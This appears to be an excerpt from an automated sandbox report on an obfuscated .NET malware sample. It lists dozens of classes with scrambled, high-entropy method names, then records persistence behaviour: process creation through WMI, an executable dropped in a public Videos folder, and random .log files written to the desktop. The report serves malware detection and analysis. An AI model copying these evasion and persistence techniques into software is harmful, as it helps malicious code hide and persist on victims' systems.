Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, DGFlcE80b8JNobvVUXc.cs High entropy of concatenated method names: 'o8V8VC9rTu', 'HoJ8C2cXTy', 'LAt844nNPn', 'sfqkvOU4itA941eDPMBm', 'QpiGM7U4rOvUoHbPc0ZD', 'zctVR7U4WEgwWlJTTUDq', 'tmG1g7U4AlaDvpkY1ApV', 'mhZ81PcDX6', 'tKv8POOMee', 'P6sGyQU4xGiUODaGSiGl'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, vnpnbCxzghZ0BorguNs.cs High entropy of concatenated method names: 'A9CwtU2g9l', 'FtUc8jUTnRuWioxmbYGg', 'P59iSjUTkVjwXDmkhwBY', 'babmCQUTEyH8qoqGvB10', 'kdEakGUTa7Edoh594WUX', 'eq7', 'd65', 'f3PUYGepihL', 'i9cUY77fMA1', 'ODgUIotBy2y'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, OccFLeUijS83Gb9EMKw.cs High entropy of concatenated method names: 's2CUmnMYGi', 'nc4U0kgLk2', 's7ZUyZMdvm', 'gKeXVxUMcRiRVZj1nMep', 'Y2tulRUM3MZOsiUkauKg', 'vjPN8tUMLoxawwjABaX6', 'ECERYqUMfraZo3nEdObJ', 'PEo8l8UMn9cT5KBGL4rY', 'YK9rC0UMksar5OjhPWLW'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, Rw9aZa8jr9fAb5q2pwr.cs High entropy of concatenated method names: 'Dbx83CMD3O', 'X5i8LCIVOn', 'TEP8c8bPdP', 'Pe58fxsEP1', 'ehv8nl6gpn', 'MWk8k1PiFO', 'wD38EVFQOF', 'Amn8aBl2yL', 'XTS8h8HKKs', 'Smd86PEDaY'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, Sdda55wLc9fEvK4sCqf.cs High entropy of concatenated method names: '_2SY', 'MWpUITJPZow', 'OQrwfRACND', 'fdfUI3WSZC1', 'nJGns9U3POsikHwkw3m2', 'PNeaehU350b9FoJvT1AS', 'bysIiLU31y8kfEdswRIt', 'A3UcARU39PG3JmWOxoxv', 'kAEQTiU3Mo5tYhoRYXjD', 'gcIURaU3Vqx5w4lhC3Gs'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, CNGS1Ywx4QKFymOCPD9.cs High entropy of concatenated method names: 'qicwiJhaTf', 'tIryL2UTe9G9r89qvfGp', 's0XdslUTlkBSHYxW9ubv', 'YAnjuaUTKlQ5tbORlZ6r', '_53Y', 'd65', 'W6IUY5GZBH7', 'Wv4UY1rtd0o', 'fXCUIubhyGP', 'zp2UYRcxbBk'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, pXW4euSHeJXI9S28nlT.cs High entropy of concatenated method names: 'R3gS6gEK7o', 'ba3SsgYIti', 'z8cSNZ84Dk', 'FQWYhdUpPWHZH81129cU', 'hKs5qbUp97HxZ49kiCo1', 'IkHrfyUp5mR5xyaFpEiL', 'HqZqKiUp1QYdiVIGOxZq', 'MvFSjZD9xL', 'w7OST8Faml', 'KlZS3wnnhd'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, rPwErV8QS2EWByRUlUd.cs High entropy of concatenated method names: 'HPgYrjaYPr', 'N9frsSUovrp1m0miUb3c', 'fJeERXUotrqswVV0V3iA', 'hNQ8QpUo80pDhCV8yceZ', 'gmmV1cUoYI50flDT0b8X', 'qJNaBjUoweaOBo66dUoL', 'Ju4ENsUoID8uttOcZXIj', 'BEeT9HUoxwQFLw7HIGnk', 'FMt9vGUogHNVJ5JRROdn', 'wEeYZeDtUt'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, vc1uUZxMZDE6NGQgVac.cs High entropy of concatenated method names: '_71a', 'd65', 'htqUYgZpHjj', 'yVjUYWrsUmP', 'JAEUI9J3ooJ', 'zp2UYRcxbBk', 'VMWvo4UTRN03y5UIDI0W', 'vgRtZTUTUc8N8WH94O2l', 'l0gL8NUTBLyZlwYTMjb5', 'a2jF2uUT8S8B97b7CpjZ'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, jLXs83BqEYiLKytjiG5.cs High entropy of concatenated method names: 'K6gBGjQShY', 'pk4B7vH6QU', 'UhX4XTUCBrN581dGFY8r', 'IGi31eUC82QLTJ2FCf7Q', 'LkKsRPUCYr2X07XFPZYR', 'pcFLJ7UCvxYtaWwhWaMA', 'eqrFefUCtEhLii5kC5IN', 'nOHZbPUCSPj0W5yqWYjZ'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, vJ9xG3UfoFXp3qtLQsS.cs High entropy of concatenated method names: 'n39', 'V29', '_4yb', '_2Q4', 'p93', 'di1UIyOAuTt', 'n6rU8F0761x', 'XHPBQCUVgNW27mIJArQa', 'THTpqpUVWBHpryaFiZCF', 'Sm2bh5UVA36CZiHj3Oeu'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, urbpt3Q7MLrEJObSEg4.cs High entropy of concatenated method names: 'cekQH5xZ4K', 'ctBQpPucfA', 'oD0QjuqEJw', 'wdYQTnKBRQ', 'd38Q3V4nb8', 'TG0QLk32Nf', 'GArQctnwaI', 'X5VQfx4V1A', 'DkWQnaMqU6', 'iNsQk4angb'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, L0jcodoMDE7vT5FwGl1.cs High entropy of concatenated method names: '_57l', '_9m5', 't8K', 'k49', 'p65', '_3B1', '_4Pp', '_3M7', '_7b3', 'fAL'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, AO8MU0BU1a9hwE6yPuY.cs High entropy of concatenated method names: '_5E9', 'V29', 'e6S', '_2Q4', 'CVq', 'ujvUI2IUaYg', 'n6rU8F0761x', 'DIgJwtUVTfjDNeidY1RQ', 'Pg2nh3UV3At92UGoBjMH', 'ivFINAUVLyW9GwaKaEVp'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, pKx0ZJyPx8QC5XVopv7.cs High entropy of concatenated method names: 'vNq', 'O3Q', 'a43', 'V8g', 'g39', '_9By', 'h74', 'fl2', '_4L8', '_8e1'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, i8K3StFDUFoTg9qoEj2.cs High entropy of concatenated method names: 'NnQUIhQ3cfg', 'mtAFeErmpr', 'xphFlD3J9L', 'mvoFK9CbFG', 'e5qscNUluNy8OPRDUirO', 'mEnNFFUlHUPlpmi1RX39', 'q8cMViUlpTkn3go2N5iB', 'MrgsAKUljfk6lFeyJTw7', 'xbrx1WUlTkFrE4L6yCcg', 'chCNguUl3pUTmQb6x4OA'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, URuHrCBIMbthiy4wX3j.cs High entropy of concatenated method names: 'MhMBwTTXsc', 'i1lBgTX7V7', 'JYGBWywKEg', 'JcspRDUV6ti4FY4eCNhr', 'vLN7K3UVaWyMa6l9dqTl', 'MTEmjKUVhEVsU681ud31', 'p7N70yUVsHDFa32d7iwR', 'BwGl11UVNcWAmZBMo2ZL', 'vKnBpCUVFYIDeydLivYM', 'jP3EcgUVDr6AqrnnshOS'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, qUhfWMxZTKKnp3HJBiU.cs High entropy of concatenated method names: '_64Z', 'd65', 'xLvUIPX4AcM', 'zp2UYRcxbBk', 'u08x1T7Noc', 'F98Bu6UjKxkumHass89G', 'hmcH5FUjJSKTlSjLfAsE', 'aYEoEZUjOLHf6cS15sBg', 'GixaIwUjQbn8Ww3khU3o', 'mIS9APUjXtY10K8sHw3B'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, T7M26dwmf00XyV70fot.cs High entropy of concatenated method names: '_5t1', 'd65', 'OK1UY9DtVsh', 'qS6UYMSu9Ox', 'XyUwy655B7', 'G4dUIHfdncl', 'zp2UYRcxbBk', 'MGiHC3UTOedr6W1rJA3P', 'N647nRUTQZwv1mF0ubgT', 'W0aPPJUTXxeIEdV4d6hV'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, WOCrHDZTAWo5LqBCUyn.cs High entropy of concatenated method names: 'kk8MPk8kNI', 'MQoM9L531b', 'hiq0a6UhogHhHQGqGZwE', 'JFGljqUhCPqwFuUkHNn7', 'toSl1JUh4WMCY80ZrS36', 'ppHlZUUhuhXdaRin1QTh', 'jOpMu4sB6y', 'CNcuv8UhTPTnVaCBhNht', 'KA2JkdUhp9n4LvoVGuZ2', 'KGOi9hUhj0ykpaKPVdJR'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, wVXthH3n8T6G3myquXS.cs High entropy of concatenated method names: 'OCE3ED2003', 'XA23auVsHO', 'pf73hUbCHp', 'fWV36Sk9qt', 'g0b3s7SS0h', 'dvj3NOKfMl', 'kWC3FIhp7K', 'c9C3DAFAgG', 'dpO3dXAw75', 'Fb93eh5Zyc'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, K3MrYRxoS3lKpqkMQ14.cs High entropy of concatenated method names: 'NlNxfb1bmk', 'gxxQjnUTmsJR7yBrkjcI', 'M2LGRwUTibWgPvjRMIYS', 'iufvhBUTrm9khMqEA3Ki', 'eBVU19UT090TO0g5pq0u', 'H05MVJUTygoL2DCGGjhh', 'UU8', 'd65', 's0PUYiKp0dm', 'P3BUYrDiZEk'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, o7buEyjIKSG2WlWQXtc.cs High entropy of concatenated method names: 'jX1jwSowMg', '_64r', '_69F', '_478', 'sA5jg23FWR', '_4D8', 'p6YjWn3XZ1', 'fgJjAseEFc', '_4qr', 'OpijiHGuQr'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, P5Cf1e436KNTloDetv9.cs High entropy of concatenated method names: 'r004cgjU3G', 'gSv4f4Mb4c', 'PfT4nfSYqq', 'xuw4kwrFwU', 'sps4EMacoo', 'hcMWcAUNGfHSaKVt20iX', 'TKxEJGUN7utJA46xXgj2', 't3Ux3iUNZoiH7OawM27x', 'JIfmMGUNqc2evlXmNgtd', 'W7nP0HUN2pSUu3RuuJjt'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, hLDRxa8wZGXKfG11WjD.cs High entropy of concatenated method names: 'Dly8W1vUFi', 'V1G8AZiqsx', 'Ed58iOPNJL', 'PmJaDfUCeumTToxOnDn9', 'GwsXYuUCl6kPetnKjKg8', 'rbVlmhUCD2RUipRAIcFc', 'FPSOkdUCd6V1q6IrQ90b', 'NQaD0YUCKLdd7TkWvisS', 'vTlfgGUCJpm5FilXxFTE', 'PasvvtUCO8sTO5qjsvMH'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, JyV4N6dY0a6hTdngRaX.cs High entropy of concatenated method names: 'IpDdtQN3OQ', 'LHQdSVf2kf', 'M1mdIiL7I0', 'nA7dxebYaZ', '_0023Nn', 'Dispose', 'KZMJ4JUJRAE1bfRmks2y', 'n385aIUKXUJBctKNrhu9', 'R1v47MUKzkhdTNdvVUrU', 'JVWT10UJUY2bCP37Gk9E'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, jgxeTiFJwhJAMyAckUe.cs High entropy of concatenated method names: 'jQ8DWR6stn', 'ojduNYUKiKr1y4CeUcUr', 'iM4ZgVUKrG8EioFuclEc', 'xkFCBaUKWxZRp0Gca64f', 'JUGkmQUKAqctdYIBYGCJ', 'CPX', 'h7V', 'G6s', '_2r8', 'rqoUtpijpcn'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, VxiCRQxNtOoEkFSO2FP.cs High entropy of concatenated method names: '_8X5', 'd65', 'jZcUYyeBPqI', 'HgoUYbX3aQr', 'G5yUICD1T3S', 'zp2UYRcxbBk', 'xQI5V4UTPDdBbCfsg1wC', 'irfrWqUT5658N1x75EOa', 'YyNjs5UT177P7OHIib4e', 'BsdA4ZUT9LfQGFoRj1KQ'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, wVGbI1Vdef2kCBdRYPL.cs High entropy of concatenated method names: 'RQvVl3WWep', 'ySHVKvX92H', 'rnWVJ5cYZp', 'm7mVOkSruj', 'c1RVQait7L', 'WLOVXg9SYY', 'perVz0DJEF', 'X7PCRlVpXW', 'tDgCUmW3Bn', 'HOlCBVMlmq'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, QFxANcutIyoqgSXg9je.cs High entropy of concatenated method names: 'hHKEdgUF33ao0UGaaDcP', 'N0hCNcUFj9YCuyWuyDle', 'xQYXOsUFTLTOug5YLpMX', 'ylpS2yUFL0Q1WlFNJmVk', 'XpWuICmSJ8', '_1R8', '_3eK', 'RDkux6sSvD', 'YqVuwmHwkW', 'IVnug6x5Vq'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, fN8GZyVrLBPXkDlOUPS.cs High entropy of concatenated method names: 'qlJV0KPcJ6', 'lJgVyXQ9GC', 'AkDVbZLqww', 'am7eJEU6WajBqJ0C6cGR', 'U07kbcU6w1FZJqE5AMcU', 'aVjonPU6giVMCG4CxCNL', 'b1QZLXU6An4oFEbDE6tI', 'qiGHDtU6ikKXwFSJVNg2', 'F2ksvAU6r7a4hN9mXH6u', 'NMwIS6U6mRg6ppl2VU6a'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, pqoghDvZRGvjHhQRHRS.cs High entropy of concatenated method names: 'EoMvj7GsOB', 'q41vTAjKVL', 'qQ1nbUUu4G0oKDOB9hXG', 'zryZeTUuohPKSs5DrXY3', 'M3n8ISUuuAkY36O2cKA7', 'QNFv1O9HBv', 'pD5vPtiByM', 'Xrjv9gTbp2', 'CrmvMdAsl6', 'mnZvViMYbf'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, BbO7wWS5cxbaGymyVbQ.cs High entropy of concatenated method names: 'jdUS4boB4I', 'wssKhsUpx92nGOr8XEwn', 'hRojH8UpwamoPjTipI1C', 'zMv7M8UpSjqckiDSHEBX', 'kOEV2aUpIXebeDKpg54q', 'LgDjFHUpgBMhjO47DowU', 'F8DSPUx2mF', 's4nq6AUp87Sltl8KpXnS', 'aK0VniUpU0KaxmqJVjEC', 'mHAQMnUpBkPiOX2yTYiw'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, sKiPk9lWXTPvVeyXn6A.cs High entropy of concatenated method names: 'Sorlis9WK3', 'pt6lrQ8MCE', 'GdalmIpogu', 'SjGl0QQwy7', 'HP5ly6Rt5O', 'aXflbwYqba', 'nsERYAUO68A6RfL0lNda', 'LCdaSTUOsbxjMeHgAHW0', 'rPruBwUONAAUs3lEY9tW', 'snrlOoUOF5Dh1VrcfuqJ'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, vt7VlxUKgERWgHKui7j.cs High entropy of concatenated method names: 'io8', 'V29', 'j67', '_2Q4', 'pi9', 'DoSUIqfwXWm', 'n6rU8F0761x', 'tMuNb7UVMHDa5rHfUd17', 'MSU3U8UVVp0DX759vJxA', 'CBm69qUVCfxGjmX4nxKS'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, HQveK2TZPpdYlbbymFh.cs High entropy of concatenated method names: '_0023wjg', 'Dispose', '_0023Trg', 'MoveNext', '_0023Zvw', 'get_Current', '_0023Wrg', 'Reset', '_0023Xrg', 'get_Current'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, snIgnG8supNNqgnWjmn.cs High entropy of concatenated method names: 'd3F8dbEBCp', 'KoXWoHU4ulswcmd21WLa', 'PRRfRxU4HnJxBmXKfHNJ', 'o8aIMGU4pv9kRTw3IDML', 'XRY8FxuCQ8', 'vl2lEsU4ViXHZ8tixyh8', 'E6Mtl8U4CAr2VCfjrOL3', 'vZPXqgU49t40nRij7vr5', 'mrxew9U4M6ymGJMgwAsW', 'cm6Ht9U44NMEt8bOb2Gv'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, AguDZvV8XAU4A2bj0tF.cs High entropy of concatenated method names: 'N0GVvydwVT', 'QOBVtyxOnv', 'l3JVSGn6Wf', 'xxPVIvMTGh', 'GOcVx2grMp', 'iNVJVNUhQOup9pGYLbF9', 'JuOcLAUhJYq5Kjxf6N6R', 'pOu1ZbUhOvDQNruDcSbT', 'IYCD0cUhXA288K9mlyCd', 'B93QQrUhzADOgZJs325a'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, SDxgkMCGswquS2gCb1c.cs High entropy of concatenated method names: 'ASFCZWFaMF', 'pc7C5cLcJ5', 'M62', '_1Xu', 'LuR', '_4p3', 'HVh', 'rj4C1Yrr6D', '_96S', '_9s5'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, T3ia1E48vbq77NC5FPX.cs High entropy of concatenated method names: 'aP04vwdSjZ', 'IbB4to1eya', '_7Bm', 'QMM4Sa5q7C', 'PNu4IW7AWk', 'hQG4xXlJIZ', 'zNH4wibUlu', 'BY9cEeUs3nrQZKUsi1NO', 'E4n58jUsjmMe6WLFTpAZ', 'QQ59SkUsTkdpFgnDbsEp'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, bjtl9nU91QXO1mQ3ZQk.cs High entropy of concatenated method names: 'N2T', 'V29', 'o75', '_2Q4', 'K3B', 'JmVUIm6bCgZ', 'n6rU8F0761x', 'G2683yUMeDZ3AWYEVA96', 'wAXVxqUMlsM7sGLxS8Tq', 'BhcqD7UMK9mmMdHmeErg'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, UkYMyN0ZW1dmGHQjV7r.cs High entropy of concatenated method names: 'Toc0htSZfv', 'YO901GbThj', 'Mu10PrGWuH', 'sPe09ZYweM', 'hsP0MPav5v', 'etj0VAMX4n', 'Ty60CjxleJ', 'cQ9041s8mV', 'rST0oEI9jV', 'N1f0uKGAhi'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, i9aBvAta7NQBu7uYGHI.cs High entropy of concatenated method names: 'iHASRdExvc', 'LvTSUdAfqN', 'HhTSBVWs5p', 'kJc4xnUHNdkoSwUr1J7e', 'dn68ywUH6y4NIPKopeN1', 'KPLcN7UHslW7STTa8B33', 'CVvmTfUHFJguqsZa90s1', 'lfut69iUQ5', 'MqxtsSK5ma', 'uAjtNcvjOl'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, BvKdSKz6i3GiqDst4c.cs High entropy of concatenated method names: 'FfnUUY5j6G', 'TToU8abIp7', 'RKjUYKyvSh', 'lahUvcYkkg', 'tGSUtJ8LJo', 'IPNUS29aXd', 'bvcUxCe6io', 'zpA38sUMMGgsvp2Lxpsb', 'CeNY2YUMVwJfKDltB821', 'EJ4WU1UMCHZTwEgl4Sic'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, PZVO9XQyvEW6EWkCOTf.cs High entropy of concatenated method names: 'bIKBvN28j2l', 'xo4BvFLo7O9', 'TZfq6pUQJauc3XhIRtPV', 'CGIVMxUQOsXbeiZ4BkJm', 'kdybQZUQQWwFoHKuuiwm', 'TCDAqjUQXlWm99iQWlNR'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, TkDPMiDomfmP4gpyrHD.cs High entropy of concatenated method names: 'N9xDpOgE4f', 'jTvDLXHqgQ', 'r3DDnjiTtd', 'mQ2DktrUTJ', 'UcADEOjXU5', 'dcLDaZPdtn', 'CEKDhTjfWU', 'WIUD6DSdXb', '_0023Nn', 'Dispose'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, mYFGYuDPPnsRtlgYXSW.cs High entropy of concatenated method names: 'Xyb', 'Sz4', 'zej', 'lhNDMj4EEP', 'FIH638UKComVDuN6cq99', 'iRpYpUUK4tO0ZJmNAjle', 'MMIn0SUKodQOemVVnveb', 'FQv5CZUKubr4oaAoIMVL', 'yHBvuwUKH91cZc5nhyH7', 'i87c95UKppdsiYwMErOE'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, tADCkJrqTU2Q0HlBmnu.cs High entropy of concatenated method names: 'Cj1', '_1Td', 'Cz6', 'ht3', 'VsZrGwIFo4', '_947', 'hWMr7v7Bsw', 'hbYrZQuTjQ', '_1f8', '_71D'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, EPRO5exbMxYgPbrcZqi.cs High entropy of concatenated method names: '_816', 'd65', 'DEKUYSBdXe1', 'VT1UYIBdlw4', 'xojUI1gJC4N', 'zp2UYRcxbBk', 'W4TtXgUjFcrpehRVRTkw', 'f2eW0UUjDLUGCQcIN8yP', 'NTYadEUjsUh6Fw72rtxk', 'YcS3SjUjNPZrEmy3G5sk'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, AvuW0DDJgLKXlqANM9u.cs High entropy of concatenated method names: '_7as', 'dxy', '_8Kv', 'qhNDQnDMRG', 'CEvDXUaWan', 'FjcDz8RTEW', '_0023Nn', 'Dispose', 'D4mXg3UKeZISJbAYpF1A', 'EJcGulUKllHl4hxXwcYH'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, JnrFR3NDGj5Umdksxhf.cs High entropy of concatenated method names: 'DFgNebXbnF', 'VRoNlgeGxv', 'PyoNKvokZj', 'ssCNJbdI0v', 'DxmNOG4ELF', 'tdlNQApnR8', 'n0MNXa4gI6', 'm13Nz7yM6T', 'P7OFRfjJCi', 'j20FU8i99W'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, WucFfiouWiCvvghLiuF.cs High entropy of concatenated method names: 'K2KopQ8aif', 'i11ojTBSfe', 'DxGoTKwqPi', 'Y34', '_716', 'p32', 'Na8', 'X25', 'pT1', 'DD2o39SgaR'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, BYTOxCSlRf8d8PbhFkH.cs High entropy of concatenated method names: '_5Z7', '_58k', '_4x4', 'bU6', '_3t4', 'a5C', 'kYCwnWUpj3o2XpH0hFHS', 'jQNGwtUpTk7kTx7BNuX5', 'iUg5W6Up34bG03GHSIcH', 'VdEKFPUpLkNExZh0UWD5'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, LkJErlBmfuQbEQI7Dva.cs High entropy of concatenated method names: 'uDbByuyiil', 'cBrBbuwvw1', 'hncRK2UVJeemPSTsHj66', 'nNUt10UVlq6kQZtPl6BY', 'mj2NLAUVKRnhWPwhWDvL', 'WRjjICUVOHBdHivZc286', 'tq9XJNUVQ0KU0ofDFasn', 'wxICpHUVXehDSZWWLZBv', 'CKr2DnUVzuevHCNGCsgj', 'blcSOAUCRER8chNlUjvs'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, ka9Gk8eYX7oddSeBxPu.cs High entropy of concatenated method names: 'pRaetFQs7h', 'gL0eSmKwYa', 'mggeIdMYyp', 'vpoexQIE3M', 'NO2ewPAw5Q', 'JJaegdyyC1', 'akkeWN8p1n', 'QHZeAFdqiO', 'CjceiKYmxO', 'GEZerQCUci'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, ynNMdxtSlP068ZfCbEy.cs High entropy of concatenated method names: 'kFSt2GLOgy', 'dMPtGS9IkZ', 'Pmj657UHSY8wRHjoK73j', 'euvWK1UHvgfmdXeevhQW', 'GegCGoUHtx5CfjyqaidI', 'XhTv4uUHI8hf5IChQ0rZ', 'MLetysg2oX', 'pPytbA8dOw', 'ISWXtEUH8PiQeoMQxwx1', 'cJkNfyUHUueU1gwFK0YZ'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, f0273NpsOBkB35M3Fcd.cs High entropy of concatenated method names: '_25r', 'h65', 'ysYpFWHj0y', 'IcQpDfrpOk', 'f23pd9Sp7H', 'AWD', 'd78', 'A6v', 'dqG', 'M96'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, wkXiTKeERMVdYVr8C01.cs High entropy of concatenated method names: 'C0sehqyPsj', 'l8Se6TgcRU', 'rVIesETM53', 'rXQeNBOeq8', 'LgxeFkbtKr', 'Ru7eDU38Vw', 'GlfedUwMUu', 'JbGeeucbP9', 'Tcr7ROUOZ5CJMIT0YcvF', 'ymULXoUOGxSv0UxV2TwJ'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, jKDEdMg4pSELQIYm4Ef.cs High entropy of concatenated method names: 'XwvAqFLkE7', 'JNBHBtULhvgCXjrsJR8R', 'Qg4mmkULEXY9YpJKb8HN', 'hDJDBpULavHG0nbt8t8E', 'Vdjgu5lhIM', 'neWgHibRSS', 'hGEgporqv4', 'edMgjuMrqJ', 'COagT7IvD0', 'KIdg3tILjP'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, lX8j2AB4QZ617OouKwU.cs High entropy of concatenated method names: 'j0UBfE0C1R', 'QKtSa9UCbmjkSA7yX7T0', 'yW5YlSUC0pQqdpxwUul2', 'zBsSfOUCyYac24gJKwch', 'F9JQhtUCqpUtdJrRyWRL', 'RjhqXAUC23eC0DaOJjSM', 'cU5MMJUCGQ3MOuV0qUD6', 'LkDBujAoWH', 'hlFBHRTfpS', 'EcPBpGsGho'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, pxw1SGV2fdojUI1JXeH.cs High entropy of concatenated method names: 'plDV7AoG9M', 'dBTVZN4Iwy', 'kTMV5agsuo', 'v29V1nFIcj', 'sX7VPuShV3', 'rMjV9XHooa', 'DIeYbJU62sB30Ft0vZLT', 'qaC7y7U6b1HmXjUpLlnF', 'fBAsrjU6q7fbnI0NsnRP', 'AeFU0LU6GWskBfNhIXKD'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, b5NKhLy17ibJYUQjat.cs High entropy of concatenated method names: 'JPxpfSB2e', 'TkTEnhU9KttmZTWeHocH', 'kOmx1gU9e1ifoCoUUXYP', 'YKbo67U9lYLY4iavrwQ5', 'yWbXjuU9JhsVYwWRxkQv', 'MOLqujRan', 'pIW2dAA5y', 'BvAG6cRQi', 'MHk73LE85', 'l6FZR3opI'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, BoKyWKdAmvbd2b2RMwn.cs High entropy of concatenated method names: 'VSmUt3LohcH', 'nOuUtLpR3ss', 'e97UtcbLJbj', 'PhkVVKUJpBFdRgeBKiLR', 'yE2jBoUJu2b1s2ESHytF', 'iJtFGxUJHHefsc49ckjJ', 'ofKUI6ZGnvu', 'nOuUtLpR3ss', 'WjKkMoUJLgJ3KQybqftD', 'kiKKIIUJTPHeG92HABwl'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, IJJw9EvAOuvS43y66rB.cs High entropy of concatenated method names: 'Wc7', 'k7S', '_37r', 'M3FUIGVFiiA', 'Er0U8zHOTet', 'vd2uPNUuINX1cSlsBnHk', 'Q21nhRUuxLutwTnRneJM', 'FmJycEUuwsbCYeipGYc0', 'YKZQjKUuguHqOwSiGHRd', 'EyVftiUuWMpViZoGWLfj'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, LdTxK5idbydrif7a5IA.cs High entropy of concatenated method names: 'BuGil27VDy', 'ItIiKNiJds', 'qLJiJM2XIc', 'vyWiOkrEYB', 'WBYiQadbv3', 'X29hl8UccMncTWYQXncE', 'DuEge7Uc3r1bCfDV4W2i', 'AtvQsEUcLVgPITATCnoY', 'TNftiZUcfo976f7UL0me', 'ToEosSUcnJvUlB1JRC9S'
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, L526CTiuqPoUqFeb8LJ.cs High entropy of concatenated method names: 'j9l', 'muJipB5bsr', 'rNMijgruKN', 'dnBiTkekVY', 'm42i3AZrm4', 'Ft3iLnCOpc', 'wP9icK7ADP', 'TLhEwlUc95oJqRIM4Id3', 'YiVkGaUc1HNdrd5uwZ4i', 'RBwYPtUcPKcg2jNYe6Cl'

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\fTGLCVSM.log
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\stDzyxQe.log
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\yuQrGMvY.log
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\uDZAyPvf.log
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File created: C:\Users\user\Desktop\gUHludjC.log
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File created: C:\Users\user\Desktop\PwjnMVKl.log
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File created: C:\Users\user\Desktop\fcdLmHlJ.log
